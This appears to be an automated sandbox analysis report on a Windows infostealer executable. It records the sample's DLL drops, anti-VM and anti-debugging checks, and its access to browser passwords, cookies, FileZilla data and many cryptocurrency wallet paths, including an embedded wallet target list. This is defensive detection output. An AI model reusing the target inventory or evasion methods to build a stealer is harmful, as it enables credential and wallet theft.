                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; File opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: Binary string: mozglue.pdbP source: pYJeC4VJbw.exe, 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                  Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                  Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                  Source: Binary string: nss3.pdb@ source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
                  Source: Binary string: nss3.pdb source: pYJeC4VJbw.exe, 00000000.00000002.2903802204.000000006D1CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                  Source: Binary string: mozglue.pdb source: pYJeC4VJbw.exe, 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

                  Data Obfuscation

                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Unpacked PE file: 0.2.pYJeC4VJbw.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Unpacked PE file: 0.2.pYJeC4VJbw.exe.400000.0.unpack
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00416240
                  Source: softokn3.dll.0.dr; Static PE information: section name: .00cfg
                  Source: softokn3[1].dll.0.dr; Static PE information: section name: .00cfg
                  Source: freebl3.dll.0.dr; Static PE information: section name: .00cfg
                  Source: freebl3[1].dll.0.dr; Static PE information: section name: .00cfg
                  Source: mozglue.dll.0.dr; Static PE information: section name: .00cfg
                  Source: mozglue[1].dll.0.dr; Static PE information: section name: .00cfg
                  Source: msvcp140.dll.0.dr; Static PE information: section name: .didat
                  Source: msvcp140[1].dll.0.dr; Static PE information: section name: .didat
                  Source: nss3.dll.0.dr; Static PE information: section name: .00cfg
                  Source: nss3[1].dll.0.dr; Static PE information: section name: .00cfg
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: 0_2_004176C5 push ecx; ret 0_2_004176D8
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: 0_2_6CFCB536 push ecx; ret 0_2_6CFCB549
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; File created: C:\ProgramData\mozglue.dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; File created: C:\ProgramData\nss3.dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; File created: C:\ProgramData\msvcp140.dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; File created: C:\ProgramData\freebl3.dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; File created: C:\ProgramData\vcruntime140.dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; File created: C:\ProgramData\softokn3.dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-74900)
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Dropped PE file which has not been started: C:\ProgramData\nss3.dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; API coverage: 4.8 %
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040D1C0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004015C0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00411650
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040B610
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040DB60
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040D540
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00412570
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_004121F0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00411B80
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe; Code function: 0_2_00401120 GetSystemInfo,ExitProcess,0_2_00401120
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002DD5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884824643.0000000002DBB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe API call chain: ExitProcess graph end node graph_0-74885
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe API call chain: ExitProcess graph end node graph_0-74888
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe API call chain: ExitProcess graph end node graph_0-75933
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe API call chain: ExitProcess graph end node graph_0-74938
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe API call chain: ExitProcess graph end node graph_0-74906
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe API call chain: ExitProcess graph end node graph_0-74899
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe API call chain: ExitProcess graph end node graph_0-74914
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe Code function: 0_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417B4E
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exeCode function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00416240
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe Code function: 0_2_00415DC0 mov eax, dword ptr fs:[00000030h] 0_2_00415DC0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00404C70
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe Code function: 0_2_00419DC7 SetUnhandledExceptionFilter, 0_2_00419DC7
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe Code function: 0_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004173DD
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe Code function: 0_2_6CFCB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6CFCB66C
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe Code function: 0_2_6CFCB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CFCB1F7
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe Code function: 0_2_6D17AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6D17AC62

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe Code function: 0_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00415D00
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe Code function: 0_2_6CFCB341 cpuid 0_2_6CFCB341
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00414570
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe Code function: 0_2_00414450 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 0_2_00414450
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe Code function: 0_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_004143C0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe Code function: 0_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_004144B0

                  Stealing of Sensitive Information

                  Source: Yara match File source: 0.2.pYJeC4VJbw.exe.2c80e67.2.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.pYJeC4VJbw.exe.2c80e67.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.3.pYJeC4VJbw.exe.2cc0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.pYJeC4VJbw.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.3.pYJeC4VJbw.exe.2cc0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000003.2489810753.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.2884861560.0000000002DD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: pYJeC4VJbw.exe PID: 6936, type: MEMORYSTR
                  Source: Yara match File source: sslproxydump.pcap, type: PCAP
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: ite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2884861560.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
                  Source: pYJeC4VJbw.exe, 00000000.00000002.2895207403.000000001D4F0000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Binance\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                  Source: Yara match, File source: Process Memory Space: pYJeC4VJbw.exe PID: 6936, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match, File source: 0.2.pYJeC4VJbw.exe.2c80e67.2.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0.2.pYJeC4VJbw.exe.2c80e67.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0.2.pYJeC4VJbw.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0.3.pYJeC4VJbw.exe.2cc0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0.2.pYJeC4VJbw.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0.3.pYJeC4VJbw.exe.2cc0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000000.00000003.2489810753.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000000.00000002.2884861560.0000000002DD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: pYJeC4VJbw.exe PID: 6936, type: MEMORYSTR
                  Source: Yara match, File source: sslproxydump.pcap, type: PCAP
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, Code function: 0_2_6D180D60 sqlite3_bind_parameter_name,0_2_6D180D60
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, Code function: 0_2_6D180C40 sqlite3_bind_zeroblob,0_2_6D180C40
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, Code function: 0_2_6D0A8EA0 sqlite3_clear_bindings,0_2_6D0A8EA0
                  Source: C:\Users\user\Desktop\pYJeC4VJbw.exe, Code function: 0_2_6D180B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,0_2_6D180B40
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
